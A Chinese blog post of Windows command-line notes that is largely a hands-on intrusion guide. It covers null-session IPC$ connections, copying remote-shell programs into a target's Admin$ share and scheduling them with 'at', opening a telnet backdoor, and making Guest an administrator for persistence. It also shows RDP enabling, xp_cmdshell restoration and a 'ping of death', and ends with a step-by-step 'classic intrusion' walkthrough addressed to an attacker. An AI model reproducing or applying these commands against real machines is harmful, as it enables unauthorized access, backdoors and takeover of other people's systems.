net use命令详细的使用方法

2010年01月14日 | 学习笔记,工具收集| 坏人咖啡

net share abc$=c:\
将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录)
net share c$ /del
禁止C$共享
net use z: \\*.*.*.*\C$
把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z：盘
net use c: /del
删除映射的c盘
net use * /del /y
删除全部
net start
显示本地主机当前服务
net start telnet
启动 Telnet 服务
net start Server
启动 Server 服务 (IPC$ 和共享要*这个服务)
net stop Messenger
停止信使服务(不会在有烦人的Win的弹出广告了)!
net stop server
停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵)
net user
得到本地主机的用户列表
net user guest /active:yes
将停用的guest帐号激活(变为可用)
net user guest 888888
把 Guest 帐号的密码改为 888888
net localgroup Administrators guest /add
把 Guest 加到Administrators组中(这样你就有了超级权限了)
net view \\*.*.*.*
查看指定IP主机上的共享
nbtstat -A *.*.*.*
得到远程主机的NetBIOS用户名列表
net share
查看本地主机的共享资源(本地的默认共享也可以看到)
net use \\*.*.*.*\ipc$ “” /user:””
建立空连接
telnet *.*.*.* 90
连接对方机子的telnet,端口为90
ipconfig
查看本机的IP信息
入侵ipc过程序命令
——————————————————–
net use \\*.*.*.*\ipc$ “” /user:”Administrator”
建立用户名为 Administrator 密码为空的连接
copy server1.exe \\*.*.*.*\Admin$\system32
即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内
net time \\*.*.*.*
查看远程主机的当前时间
at \\*.*.*.* 14:00 server1.exe
在对方机子添加一个在 14:00 运行 server1.exe 的任务
——————————————————-
3389 DOS开启
——————————————————-
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
———
C:\>dir c:\sysoc.inf /s
检查INF文件的位置
C:\> dir c:\sysocmgr.* /s
检查组件安装程序
——————————————————-
query user
查看正在使用的用户
logoff user
踢掉正在使用帐号的ID（这里的ID不是你的帐号）
——————————————————-
删除Radmin服务
r_server.exe /stop
r_server /uninstall /silence
——————————————————-
开启cmdshell的SQL语句
EXECsp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’
判断存储扩展是否存在
Select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’xp_cmdshell’
返回结果为1就OK
恢复xp_cmdshell
Exec master.dbo.addextendedproc ‘xp_cmdshell’,’xplog70.dll’;select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’xp_cmdshell’
返回结果为1就OK
否则上传xplog7.0.dll
Exec master.dbo.addextendedproc ‘xp_cmdshell’,’C:\WinNt\System32\xplog70.dll’
堵上cmdshell的SQL语句
sp_dropextendedproc “xp_cmdshell”
Select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’xp_cmdshell’

net use 命令的使用2006-07-31 07:481、建立IPC$、admin$连接：net use \\计算机名或IP\ipc$          (输入administrator与
password)
2查看连接共享：net share
3、映射共享到本地：net u** *： \\计算机或IP\共享名称  如：net u** *: \\pc1\c$
net use \\ip\ipc$ “密码”  /user:”用户名” 建立IPC非空链接
net use h: \\ip\c$ “密码” /user:”用户名” 直接登陆后映射对方C：到本地为H:
net use h: \\ip\c$ 登陆后映射对方C：到本地为H:
net use \\ip\ipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名　密码　/add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名　 开启服务；(如:net start telnet， net start schedule)
net stop 服务名 停止某服务
net time \\目标ip 查看对方时间
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \\ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip “文本信息” 向对方发信息
edit 打开某文件
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C：共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况，常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
netstat -s 查看正在使用的所有协议使用情况
nbtsta* -* ** 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、
/A-A表示
删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除
当前目录下除系统文件以外的所有文件
经典入侵模式
    这个入侵模式太经典了
    1. C:/>net use //127.0.0.1/IPC$ “” /user:”admintitrators”  
    这是用《流光》扫到的用户名是administrators，密码为”空”的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，
就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为”空”，所以第一个引号处就不用输入，后面一个双引号里的是用户名，
输入administrators，命令即可成功完成。
    2. C:/>copy srv.exe //127.0.0.1/admin$  
    先复制srv.exe上去，在流光(下面提供下载)ools目录下就有（这里的$是指admin用户的c:/winnt/system32/，大家还可以使用c$、d$，意思
是C盘与D盘，这看你要复制到什么地方去了）。
    3. C:/>net time //127.0.0.1  
    查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。
    4. C:/>at //127.0.0.1 11:05 srv.exe  
    用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）  
    5. C:/>net time //127.0.0.1
    再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。
    6. C:/>telnet 127.0.0.1 99  
    这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口
的Shell。
    虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了
    7.C:/>copy ntlm.exe //127.0.0.1/admin$ s
    用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。
    8. C:/WINNT/system32>ntlm  
    输入ntlm启动（这里的C:/WINNT/system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现”DONE”的时候
，就说明已经启动正常。然后使用”net start telnet”来开启Telnet服务！  
    9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,
哈哈)
    为了以防万一,我们再把guest激活加到管理组  
    10. C:/>net user guest /active:yes  
    将对方的Guest用户激活
    11. C:/>net user guest 1234  
    将Guest的密码改为1234,或者你要设定的密码
    12. C:/>net localgroup administrators guest /add  
    将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机)